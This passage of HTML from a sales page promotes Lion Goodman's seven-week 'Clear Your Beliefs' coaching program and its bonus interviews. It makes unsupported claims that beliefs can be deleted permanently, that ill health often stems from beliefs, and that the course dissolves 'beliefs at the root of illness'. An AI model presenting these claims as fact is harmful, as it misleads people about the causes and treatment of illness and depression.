enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting 